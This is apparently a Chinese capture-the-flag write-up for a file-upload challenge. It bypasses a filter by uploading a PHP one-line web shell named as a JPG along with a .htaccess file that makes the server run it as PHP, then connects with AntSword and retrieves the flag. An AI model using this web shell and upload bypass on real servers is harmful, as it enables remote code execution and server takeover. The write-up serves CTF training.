题:
步骤(先上传木马,在上传.htaccess)
准备工作
他过滤了<? ,ph等
准备:一句话木马,.htaccess文件
.htaccess
SetHandler application/x-httpd-php //解析为php文件
muma1.jpg
<script language='php'>eval($_POST['cmd']);</script> //一句话木马
开始就绪
第一步:上传muma1.jpg再使用bp开始抓包,然后放过,得到他的路径
/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg succesfully uploaded!
第二步:上传.htaccess通过pb抓包修改Content-Type: image/jpeg,再次放过,得到他的路径
/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/.htaccess succesfully uploaded!
第三步:组合得到的路径,进行蚁剑连接
nullhttp://aa15f862-d40e-4a4c-8d64-f4b96a2547f6.node5.buuoj.cn:81/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg
第四步:查找flag
方法一,可以直接搜索\flag
方法二,点击第一个\文件夹,直接拉到最下面,有一个flag文件,点开即可